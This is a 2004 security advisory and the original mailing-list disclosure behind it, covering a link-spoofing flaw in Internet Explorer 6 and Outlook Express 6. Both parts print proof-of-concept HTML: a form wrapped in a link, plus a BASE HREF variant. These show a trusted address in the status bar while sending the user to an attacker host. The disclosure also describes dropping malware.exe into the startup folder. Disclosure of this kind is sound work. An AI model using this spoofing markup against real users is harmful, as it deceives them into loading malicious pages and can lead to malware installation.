Microsoft Internet Explorer Does Not Correctly Display Links With Embedded FORM Data
|
|
SecurityTracker Alert ID: 1009604
|
|
SecurityTracker URL: http://securitytracker.com/id?1009604
|
|
CVE Reference: CAN-2004-1104
(Links to External Site)
|
Updated: Dec 1 2004
|
Original Entry Date: Mar 31 2004
|
Impact: Modification of system information
|
Exploit Included: Yes
|
Version(s): 6
|
Description: A vulnerability was reported in Microsoft Internet Explorer. A remote user can create HTML with an embedded link that spoofs the
destination URL and causes the browser to fail to display the actual destination URL. Microsoft Outlook Express is also affected.
malware reported that a remote user can create HTML that contains a link with an HTML FORM action embedded within the link. The
browser's status bar will display the link address but not the FORM action address. However, the browser will load the FORM action.
Demonstration
exploit HTML can be in the following form:
<A href="http://[apparent destination]">
<FORM action=[actual destination] method=get>
<INPUT
style="BORDER-RIGHT: 0pt; BORDER-TOP: 0pt; FONT-SIZE: 10pt; BORDER-LEFT: 0pt;
CURSOR: hand; COLOR: blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR:
transparent;
TEXT-DECORATION: underline" type=submit value=http://[apparent destination]>
</A>
A remote user can create HTML
with a spoofed link that, when loaded by the target user, will direct the target user's browser to a malicious URL which can then
redirect the target user to the spoofed link. In this manner, the target user may be completely unaware of the malicious action.
A
demonstration exploit is available at:
http://www.malware.com/not-so-good.zip
In October 2004, malware reported that a BASE
HREF tag is also affected [CVE: CAN-2004-1104]. A demonstration exploit is provided:
<base href="http://www.microsoft.com">
<a
href=><form action="http://www.malware.com"
method="get"><INPUT style="BORDER-RIGHT: 0pt; BORDER-TOP: 0pt;
FONT-SIZE: 10pt;
BORDER-LEFT: 0pt;
CURSOR: hand; COLOR: blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR:
transparent;TEXT-DECORATION: underline" type=submit
value=http://www.microsoft.com></form></a>
A demonstration exploit is available at:
http://www.malware.com/mwaresoft.html
|
Impact: A remote user can create a spoofed link that will load an arbitrary URL.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.microsoft.com/technet/security/ (Links to External Site)
|
Cause: Input validation error, State error
|
Underlying OS: Windows (Any)
|
Reported By: "http-equiv@excite.com" <1@malware.com>
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: Wed, 31 Mar 2004 18:04:54 -0000
From: "http-equiv@excite.com" <1@malware.com>
Subject: NOT GOOD: Outlook Express 6 + Internet Explorer 6
|
Wednesday, March 31, 2004
This is somewhat disconcerting. Reference the recently disclosed
Internet Explorer 'bug' presently in the wild [original
discussion: http://www.securityfocus.com/archive/1/358813 with
additional input buried thereunder in subsequent threads]
allowing for complete remote compromise of the client machine
without any user interaction other than viewing a webpage,
through yet again, the Microsoft Internet Explorer browser.
A lot of 'chatter' or very bold claims 'having been the first to
see this and analyse it' seem to have appeared recently that
would make this particular bug well known for at least 6 weeks
now. We must assume that these claimants had immediately
notified the manufacturer of this particular device that allows
for all of this immediately back then. Accordingly 6 weeks have
transpired and to date all users of this particular merchant's
product remain vulnerable.
It still remains "unpatched".
Perhaps to speed things up, the introduction of the Outlook
Express email client from the same merchant might be necessary:
Commence:
Outlook Express number 6 has fairly stringent security settings
in default mode, most notable, setting all actions in the so-
called 'restricted zone'. This disallows such things as frames,
scripting, objects etc.
However it does allow from one interesting piece of html
Forms:
<A
href="http://www.microsoft.com">
<FORM action=http://www.malware.com/t-bill.html method=get>
<INPUT style="BORDER-RIGHT: 0pt;
BORDER-TOP: 0pt; FONT-SIZE: 10pt; BORDER-LEFT: 0pt; CURSOR:
hand; COLOR:
blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR: transparent;
TEXT-DECORATION: underline" type=submit
value=http://www.microsoft.com>
</A>
What is of particular interest is that if we encase our html
form with a run-of-the-mill 'link', we are able to spoof in our
status bar our true destination:
[screen shot: http://www.malware.com/not-good.png 24KB]
as well as re-style our form to suit our needs.
What we then do is construct our original functional demo to:
a) redirect immediately on loading to the 'suggested' address;
that is http://www.microsoft.com
b) at that instance [prior], drop our malware.exe into our
startup folder for execution the next day
while the recipient is blissfully unaware viewing the site as
indicated.
Fully Functional Harmless Demo:
http://www.malware.com/not-so-good.zip
note: regardless of where this is viewed, it is governed by
the 'restricted zone' at all times
In this particular demo, we drop malware.exe into C: trivial
tweaking via shell or full path places it wherever we like. This
fully functional demo is heavily diluted. Practical
implementation requires minor modifications on the
transmitting client side. This demo will be flagged by AV suites
owing to past usage and recognisable code.
End Call
--
http://www.malware.com
|
|
